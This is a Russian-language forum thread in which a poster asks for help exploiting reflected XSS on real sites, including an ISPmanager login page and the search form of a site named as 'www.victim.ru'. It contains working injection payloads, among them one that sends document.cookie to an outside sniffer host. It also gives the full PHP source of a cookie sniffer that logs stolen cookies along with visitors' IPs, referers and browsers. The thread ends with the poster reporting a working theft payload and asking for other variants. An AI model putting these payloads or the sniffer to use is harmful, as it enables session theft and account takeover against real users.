Я когда вставляю код в адресную строку, у меня оно срабатывает в поиске, но не как скрипт(( что делать?
второй раз вставляю пост если удаляете пишите пожалуйста почему? Имеется сайт,запрос вида: site/manager?alert(/x/); выкидывает меня на страницу вида https://site/manager/?alert(/x/);?alert(/x/); Там находится страница авторизации isp manager,НО запрос вида: site/manager/?'/ HTML: </script><script>alert(/x/); выдаёт пустую страницу,но код этой страницы таков: HTML: <script language='JavaScript'>location = 'https://site/manager/?'%3C/script%3E%3Cscript%3Ealert(/x/);?'%3C/script%3E%3Cscript%3Ealert(/x/);';</script> Насколько я понимаю, здесь соит фильтр ,который не даёт мне использовать символы < > ??? если мне удасться,обойти фильтрацию перекодировкой например,возможна ли здесь пассивная XSS??? ...если копирую содержимое страницы на жёсткий, и там правлю, то понятное дело всё получается но как только ссылается на сайтик так лажа... что то я совсем запутался выручайте
xss Вот другая ситуация есть уязвимость в форме поиска, можно испольщзовать onmouseover= и хтмл код, ява отказывается исполняться... ...У меня два вопроса, почему не хочет исполняться ява скрипт в форме <html></html> или без неё и что кроме псевдо дефейса вообще возможно выжать из этого? может быть линк на тему где ИМЕННО ЭТИ вопросы обсуждены?.. Вот новая Ремарочка... ява работает в мозиле, однако отказывается в хроме и отключается в ишаке... мои два вопроса всё же актуальны,прошу подсказать
Вот простой для вас вопрос я думаю... site/search/?q=" onmouseover=prompt(3333) /><html><script>document.write(document.cookie);</script><script src="http://127.0.0.1/my.net/14/sniff.php?cookie="+document.cookie;></script></html>bad=<" в итоге на экране я вижу куки,а на сниф приходит пустота... вот код снифа: HTML: <?php if (isset($_GET['cookie'])) { $text = "New cookie accept from ". $_SERVER['REMOTE_ADDR'] ." at ". date('l jS \of F Y h:i:s A'); $text .= "\n".str_repeat("=", 22) . "\n" . $_GET['cookie']."\n".str_repeat("=", 22)."\n"; $file = fopen("./sniff.txt", "a"); fwrite($file, $text); fclose($file); } $date=date("[D|d/m/Y|H:i]"); $ip=getenv("Remote_addr"); $real_ip=getenv("HTTP_X_FORWARDED_FOR"); $otkuda=getenv("HTTP_REFERER"); $browser=getenv("HTTP_USER_AGENT"); $win=getenv("windir"); $uid=implode($argv," "); $fp=fopen("./log.txt","a"); fputs($fp,"$date\t|$uid|\t$ip($real_ip)\t$browser\t$otkuda\t$win\n"); fclose($fp); ?>
нашёл решение для снифера, работает исключительно так: HTML: www.victim.ru/search/?q=" onmouseover=/><script>img=new Image ();img.src="http://sniff/sniff.php?cookie="%2Bdocument.cookie</script><h1>bad=<" (( может кто-нибудь подскажет ,другие варианты?
